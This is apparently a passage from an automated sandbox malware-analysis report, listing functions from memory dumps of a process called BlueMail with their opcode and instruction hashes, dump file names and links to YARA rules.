Opcode Fuzzy Hash: 02bd5bf6b3bca2fb2b916b98e3387f9c2b4dac8017a4ff3ad9d91d410b45524e
Instruction Fuzzy Hash: 8CE0C274E05208EFCB84EFA8D545AACBBF9EB48311F10C1AA9C18A3341D7719A91DF91

Function 0618A3D0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02bd5bf6b3bca2fb2b916b98e3387f9c2b4dac8017a4ff3ad9d91d410b45524e
Instruction ID: 9eee8a18d5af293ce1e75b2aba8b54bafd48ce4255a973709e7b1d9c1864731e
Opcode Fuzzy Hash: 02bd5bf6b3bca2fb2b916b98e3387f9c2b4dac8017a4ff3ad9d91d410b45524e
Instruction Fuzzy Hash: 7AE0C974D04208EFCB84EFA8D5446ACBBF9EB48311F10C0AA9C58A3340D7719E51DF91

Function 06044B00 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61ecbff26977f1dffb63ca0573785c4eff32ec72099c5eafef4a1cf1bd999a0d
Instruction ID: c76f9f048b22af923856d0c71c4dbc603ce42f590d12977258dc53da219ce223
Opcode Fuzzy Hash: 61ecbff26977f1dffb63ca0573785c4eff32ec72099c5eafef4a1cf1bd999a0d
Instruction Fuzzy Hash: ABE0CD707C03289BDFF875B64C01B7937D5DF45611F540475EA165F280D961D84283D6

Function 05A63780 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 839f4d3461325321081ad112f183312f09d62ab9ca308c4c127b8bf3d6a2cc8d
Instruction ID: 1bbde58e653f65258510170654eb3df50b8dcee58a8ddbc2fa5d87c358de3268
Opcode Fuzzy Hash: 839f4d3461325321081ad112f183312f09d62ab9ca308c4c127b8bf3d6a2cc8d
Instruction Fuzzy Hash: 80E092B24052489FC704EBF4D914B4A7BF8EB0A106F0004EAD049E7151EB314650D7A2

Function 05A6B619 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29395f8e4b0b2d2e85e202e7c52d2fa9721ae609082353641039ab3ee1fb88a3
Instruction ID: 1c88a437c1feb16237b81afd44199faaf53f63845977b0627291c63e3062e337
Opcode Fuzzy Hash: 29395f8e4b0b2d2e85e202e7c52d2fa9721ae609082353641039ab3ee1fb88a3
Instruction Fuzzy Hash: E4E0D834149145DBC309C798DA40B697BF19B46209F18C0D9C85CC73A3D6324D43C751

Function 05A68918 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5ac2f2e1e036e32c131ae6ee1469b5e3f2b808d0dc900fa60d0cf47e359b5ef
Instruction ID: 86a8d05abeda589a863fce2a16af225fe3d64c7fd19a27a22b241c16f18b60c5
Opcode Fuzzy Hash: a5ac2f2e1e036e32c131ae6ee1469b5e3f2b808d0dc900fa60d0cf47e359b5ef
Instruction Fuzzy Hash: 1BE08C7250C104ABD704CB89CD42FA5B7BDEB27235F244298D829833D1D6769901D6E2

Function 05A68D00 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc5778de3be8f41481bc50ce5068717f2bca3242daf7179d2064e7ffb18da8e
Instruction ID: 0cc3d7e2a33de24741d6dac11428b88cf60b8d4439848c4ccb35ebf18ac77d08
Opcode Fuzzy Hash: 3fc5778de3be8f41481bc50ce5068717f2bca3242daf7179d2064e7ffb18da8e
Instruction Fuzzy Hash: 04E0E574E04208EFCB94DFA8D544AACFBF9EB48205F2080A9985893340D6759A41CFA1

Function 05A6F4D0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc5778de3be8f41481bc50ce5068717f2bca3242daf7179d2064e7ffb18da8e
Instruction ID: 7289503578fa1372800c227fd22ecbd30515b1ceee19caf25e48f1b653f9e384
Opcode Fuzzy Hash: 3fc5778de3be8f41481bc50ce5068717f2bca3242daf7179d2064e7ffb18da8e
Instruction Fuzzy Hash: DFE01A74E05208EFCB94DFA8E544AACFBF5FB88315F20C0A9C81893344D6319A41CF81

Function 05A6E080 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc5778de3be8f41481bc50ce5068717f2bca3242daf7179d2064e7ffb18da8e
Instruction ID: cb356fde0902eef5962a1fcf95ebbb1d1cdc4279e1e467c1c9513d3ac1194cb0
Opcode Fuzzy Hash: 3fc5778de3be8f41481bc50ce5068717f2bca3242daf7179d2064e7ffb18da8e
Instruction Fuzzy Hash: 07E0E578E04208EFCB94DFA9D544AADFBF9EB88205F2080A9982893341D6719E41CF81

Function 05A6DD00 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b864494e8c143bc50ffed5c109292869d098cd114c66c1ba54b640b9b409556
Instruction ID: 5e5c315ed03a72fe87371aba984b4a3374b4e01aa511d452d2e2745d16a165f6
Opcode Fuzzy Hash: 9b864494e8c143bc50ffed5c109292869d098cd114c66c1ba54b640b9b409556
Instruction Fuzzy Hash: C6E086B5909208EFC704EF94D940D7DBFB9EB49311F2080ADD85457341C6319A42DBA5

Function 05A68CA8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5d3596adefa913bae26727726034ca15bd412bdf56700c6ec55f62c9283807
Instruction ID: 438fafbf8da9f51a29e980a280cc70740b7dd7fd084ded7d5c841a44173c1207
Opcode Fuzzy Hash: 2d5d3596adefa913bae26727726034ca15bd412bdf56700c6ec55f62c9283807
Instruction Fuzzy Hash: 79E026B680A244CFC715EBF0C70979E7BF0DF05206F0009EAD0499B211EA790A40FB63

Function 05E8E588 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9260c668bcf42b6fd7dbf12fc1a035240b05166f4795bc4d5eba6aeaf27f1f5
Instruction ID: cb31f0e1070274dcd9f437991705cb7612a0868da5a8b23e7d64750a8c13f06a
Opcode Fuzzy Hash: d9260c668bcf42b6fd7dbf12fc1a035240b05166f4795bc4d5eba6aeaf27f1f5
Instruction Fuzzy Hash: 99E04F74D15308EFDB54EFA8D5442ACBBF9EB49305F1080A9C85CA7300E7759A84CF51

Function 06189EF0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c2012623cc7a3babc6ebfc4416a8de83f7f9bd0c01a9bdb7d0ee9305097fe1
Instruction ID: d855bfdf98f3e33b986ca3f49053202f6a53cfea01cfeb2cbcd6a8817f8d9886
Opcode Fuzzy Hash: e5c2012623cc7a3babc6ebfc4416a8de83f7f9bd0c01a9bdb7d0ee9305097fe1
Instruction Fuzzy Hash: ADE08634908208EFC708EF98D54497CBFB9EB55311F108499DC0417340C7319E51DBD5

Function 061889C0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f5a3419e3486bb2f782e87c92fa67fa31c4b2ca1c66202a345acb9a1da1774
Instruction ID: d9d406de6d59599df76b259cfe13002f2f265a38363882b335a314b17c805fab
Opcode Fuzzy Hash: f6f5a3419e3486bb2f782e87c92fa67fa31c4b2ca1c66202a345acb9a1da1774
Instruction Fuzzy Hash: 66E04F34D04208EFC784EF98D5406ACFBF8EB89315F1080EAC85857341C7315A41DF95

Function 0604C83D Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 600e3f5ef23294122a96d20fee562b56d2df622faa2d7f15c4a80225e67dfc6f
Instruction ID: 8b7ba64d4772c8cf06963504b28ae7174d224331f8d09e331b1b00f2930cc0c0
Opcode Fuzzy Hash: 600e3f5ef23294122a96d20fee562b56d2df622faa2d7f15c4a80225e67dfc6f
Instruction Fuzzy Hash: 1FE0D6BA700128CB8F00CE08A0581DEBBA4AB8A2203805025FC01C3201CA348A2687A0

Function 05A6CD70 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff837a95baaa56e6825ca7045d5f38b014a4ea1d5be235ab3b6cb090f3dacd44
Instruction ID: 12f1a094f50f31780241be869d808572cda716617dd93b5deb1ea05330d7d36f
Opcode Fuzzy Hash: ff837a95baaa56e6825ca7045d5f38b014a4ea1d5be235ab3b6cb090f3dacd44
Instruction Fuzzy Hash: 8FE08634909208EBC704DFA4D941D6CBFB5EB45311F108199DC4517340C6315F51DBA5

Function 05E8FB40 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c48a8a9485485b47325ae589ef115d826a7d77bdbd4b9c40e38d5b4046a6bb30
Instruction ID: 88c0ad8c349811d5d9db8f6d0b404bb3c6d3525cf24cb716c09040321a505614
Opcode Fuzzy Hash: c48a8a9485485b47325ae589ef115d826a7d77bdbd4b9c40e38d5b4046a6bb30
Instruction Fuzzy Hash: 35E08670904208DFC744EFE8C5456ACFBF6EB0C206F2440A9C85CD3341E6719E41CB51

Function 05E85248 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e375480513a39fb8e58e803491d556a0097bc639dae15770679651ae010f4eb9
Instruction ID: 396c57eafcf3454109eec53bc4e4727ad7bb6c7f63cbfc99ad84e7a84a4a83a5
Opcode Fuzzy Hash: e375480513a39fb8e58e803491d556a0097bc639dae15770679651ae010f4eb9
Instruction Fuzzy Hash: ACE04F74919208EFC744EFA8D584AACBBF8AB09605F1010EAD84897310EA309A40CB51

Function 0618B800 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6853221e7540ea4397f5b375f7df14725ad39d95e4a91684d8e6f7373d9b57d5
Instruction ID: 065bd11e1fcd1f8275a5f703dcf0ca43c63ff03bedb42961ec542c349ed94837
Opcode Fuzzy Hash: 6853221e7540ea4397f5b375f7df14725ad39d95e4a91684d8e6f7373d9b57d5
Instruction Fuzzy Hash: 71E0C2B29012089FCB00FBF5C50465EB7FCDB06101F0048A5D00897100EE714A40EBA2

Function 0618E480 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a9b316fc60014fab863dd522fe9f606408509988c4091e8ae45fea6caa01c45
Instruction ID: c99d3e443ad40623e97fa6659391dc49dcc25b050085c78bf077fa4c92f98137
Opcode Fuzzy Hash: 4a9b316fc60014fab863dd522fe9f606408509988c4091e8ae45fea6caa01c45
Instruction Fuzzy Hash: 7DE0C234908208DFC708FF94E54456CBFB9EB85305F2080D8C80867351C7729E42DB91

Function 06173ED0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05fc7040a48ef21ecedc03c894a0204d35c9bf42c254462de462642f3594f21b
Instruction ID: c266430384aaa1baa80ba448f00e0dd17ae54b4359c29d2669a16d713df41b45
Opcode Fuzzy Hash: 05fc7040a48ef21ecedc03c894a0204d35c9bf42c254462de462642f3594f21b
Instruction Fuzzy Hash: CBF06D74A00309CFD754EF64D86D7997BB2EF49309F1004D9A45AA7282CF351D84CF92

Function 0617296A Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2330084819.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6170000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2274ddf27681abdf002939691191ce504b123688a2e7d5bce6bab3af1da2af
Instruction ID: 4a091084cc6c487506397d960c465fece1bf3d134a1fab50ba9b1e37c2bdec57
Opcode Fuzzy Hash: bf2274ddf27681abdf002939691191ce504b123688a2e7d5bce6bab3af1da2af
Instruction Fuzzy Hash: FDE09274B0030DCFD758EF54D8997A9BB72DF89305F000498A41AA7281CF301D808F91

Function 0604B517 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc3018907b8df6c1dc29c2b5fc6f4e786683fee3987c8c6c43976915bd80215
Instruction ID: 7a8acbfdbb7f10de30853dd72040d6c7f367c8262b5ba4fb7b6ae53c7eed609f
Opcode Fuzzy Hash: bbc3018907b8df6c1dc29c2b5fc6f4e786683fee3987c8c6c43976915bd80215
Instruction Fuzzy Hash: DCD02E3AB00A420FE7A5EA38E80039B77C28B88600F129138A001CAB80FE20CC038E80

Function 05A68CB8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0583a350ade4fee345e8f77a75ec29c033d2a63ab6f19fdc94ca9986a7251026
Instruction ID: cf95839e44e6f83698963b118af9709c1571fbe495846e0d536f91f12836aa17
Opcode Fuzzy Hash: 0583a350ade4fee345e8f77a75ec29c033d2a63ab6f19fdc94ca9986a7251026
Instruction Fuzzy Hash: F1E0C2B28012089FC720FBF4C504A5DB7FCDB05101F0008A5D00997200EEB50A80E7A2

Function 05A63790 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5fb57af83b08e09b93035b3dc74094a73a44c37a353d8e2e35c75335499715
Instruction ID: a982f03d277f5a71bd67c8c4b85cdd5ab7b3be5b3187690a529ea76caf002294
Opcode Fuzzy Hash: bf5fb57af83b08e09b93035b3dc74094a73a44c37a353d8e2e35c75335499715
Instruction Fuzzy Hash: 85E012B1911208DFD714EFF4D50465D77F9EB0A206F1004A6D449E7150EB715A94D7A2

Function 05A6B628 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae8d674b2cb5414b293ef164059ac33de7ce90b3c6c9fc9b02d6bbf71953a1fb
Instruction ID: aad5c188c4d909f92b1a69ebf7e162eeaac264411a9919f77878005499329528
Opcode Fuzzy Hash: ae8d674b2cb5414b293ef164059ac33de7ce90b3c6c9fc9b02d6bbf71953a1fb
Instruction Fuzzy Hash: D1E0123890920CDBC704DF94D6459ACBBB9EB45315F20C1DDC84957381DA715E82DBA5

Function 05E83EB8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563a9d2e4dc4eaf7f0b5471324b469d1c67bbdd431035742454b4ea1f9a69de9
Instruction ID: 556ca11114e22794ac0622aeacb73c549ef7d9c6a151d1d6248d5f34f9f2657d
Opcode Fuzzy Hash: 563a9d2e4dc4eaf7f0b5471324b469d1c67bbdd431035742454b4ea1f9a69de9
Instruction Fuzzy Hash: 75E0C2B28012089BD700FFF4C50469DB7F8DB49101F0008A5904897100EE711A41D7A2

Function 05E8E608 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f59fd37256267d477836d2e4b81918cfc2c1ddf70a5a561dded5a243d3c97f
Instruction ID: 5d766bd31b76eff78e9921ba5f1469c12c870aa6801b8a3e321d6585f707e3b8
Opcode Fuzzy Hash: a0f59fd37256267d477836d2e4b81918cfc2c1ddf70a5a561dded5a243d3c97f
Instruction Fuzzy Hash: C0E0EC70D15218DFD744EFA8D6497ACBBF9AB49216F1011A9984D93340EA706B80DB92

Function 05A6FD18 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d450e6297f0c02607209c36ce80705e6c5528216c45a32b38092d6fb1b91d2
Instruction ID: 857044973244dfec85c0ebec03e320145190bf2f94ecad4a3dd511b096e4120b
Opcode Fuzzy Hash: 16d450e6297f0c02607209c36ce80705e6c5528216c45a32b38092d6fb1b91d2
Instruction Fuzzy Hash: F7E01234A1030DEFDF44DFB4D941BADB7F5EB49200F5085E9E9089B240EE716E01AB91

Function 05E87549 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08db62e02d74b5ffdab982f0c430a7868f57bceb34191055d7b12a587fe823b
Instruction ID: 49d81ed5212a037a61339dabb60f88b0ac11a3ccbf1f9b403d720d51f83f1bc6
Opcode Fuzzy Hash: c08db62e02d74b5ffdab982f0c430a7868f57bceb34191055d7b12a587fe823b
Instruction Fuzzy Hash: F3F07FB09146189FDBA4DF58D4847A8BBF1FB06304F60909AE44DA2251DB3599C8CF10

Function 05E8CEF1 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e44a5b63ff2f26900533dc271d6cd38ece80f7a54c6209f065d958369ce6fb5
Instruction ID: 6f97804b31eeb2954aa9a263577487e46b87f11fac233cf058aeebff74431fd2
Opcode Fuzzy Hash: 5e44a5b63ff2f26900533dc271d6cd38ece80f7a54c6209f065d958369ce6fb5
Instruction Fuzzy Hash: C7F05AB49062288FCB68EF24D8547D9BBF1BB4D301F0051EAD989A2350EB301E90CF44

Function 05A6FCD0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f0d27d430db79868d27c5e8887546302248ac02d2056ebe38902a1bbf30e1b
Instruction ID: 1652fc5296aa34e6f4a5919362ad42a930ebd7ad95f5a505133cfcc0dc36cc25
Opcode Fuzzy Hash: 67f0d27d430db79868d27c5e8887546302248ac02d2056ebe38902a1bbf30e1b
Instruction Fuzzy Hash: F3E01274A1030CEFDF04DFB8D94169DB7F5DB49204F5045A9E809D7301EE715E019B91

Function 05A68928 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4210d14bd0bb9c53a415dc7a424a7b141aec844fbe8524a1be6c6ae889969ce
Instruction ID: c6ffb7dea6780528d47c11b02c2c7f0cebc86214ec1536cfd2038bba9ac9c943
Opcode Fuzzy Hash: b4210d14bd0bb9c53a415dc7a424a7b141aec844fbe8524a1be6c6ae889969ce
Instruction Fuzzy Hash: A9D0A731509108DFC744DB94D540F79B7FDEB46215F10409CC80947341CA729E41C7D2

Function 05A635EF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e71fcbce228a1a61db38c0ceacf9c5a318d41717d9706bc888e05d10b6d77dad
Instruction ID: 3ee135947d9161d0cd4c10be4d29b2c1fc4860c14204486633ecb3c722e78a3a
Opcode Fuzzy Hash: e71fcbce228a1a61db38c0ceacf9c5a318d41717d9706bc888e05d10b6d77dad
Instruction Fuzzy Hash: 96D09E31146280CED765A7F8999DB993FB19B65207F054165C48546206CA790096CB73

Function 05A63600 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b918792fab55f68492adc5d002b0cc66fb90d9919af6db7ee32c515b6a50c811
Instruction ID: 3e7c7fc40685e8ed8e049819de76c7c455ba868fb60f3d696463c0bf8b24e94a
Opcode Fuzzy Hash: b918792fab55f68492adc5d002b0cc66fb90d9919af6db7ee32c515b6a50c811
Instruction Fuzzy Hash: 6FC08C310867048AD768B7ECA60C72836E82B05207F400020C14C021004AB510E0C5B7

Function 06041842 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67da147d2cfde247e7fb7403d17d781d67b05a6b8d231e6bb2ca0ab7e87446ee
Instruction ID: d0e790aefe43ab70ead374e15f978b982998823a812603b5c2d313710efc6534
Opcode Fuzzy Hash: 67da147d2cfde247e7fb7403d17d781d67b05a6b8d231e6bb2ca0ab7e87446ee
Instruction Fuzzy Hash: FFC04C515996910EDB12366098191256FA1965750170A01D2A042C5562DA4848C7DA36

Function 0604F8D8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a96844d52bdff505bc49584ba6855d367a3cb0a48b1146d5257ee74609e5b04
Instruction ID: 848d9a0cac626f4df844b186a669b70c68a4b9d2326e7c83d6e94c484134224d
Opcode Fuzzy Hash: 6a96844d52bdff505bc49584ba6855d367a3cb0a48b1146d5257ee74609e5b04
Instruction Fuzzy Hash: F9D012B90092819FD702CF64E544E013F35AF05210B1540CAF4489F632D676D924DB10

Function 05E87D0E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f464add4f6b1361612406f0e875eeb443d9a927554e747c61ca1f1b735d5558
Instruction ID: d6b7a485194d364a2058838fbb0eb922070521777a497cb992eb9dc0773edb80
Opcode Fuzzy Hash: 0f464add4f6b1361612406f0e875eeb443d9a927554e747c61ca1f1b735d5558
Instruction Fuzzy Hash: B9C04C76E5001E9BCF04DBD9E5418DCF7B4FF94322F004036D214A7114D6301526CF50

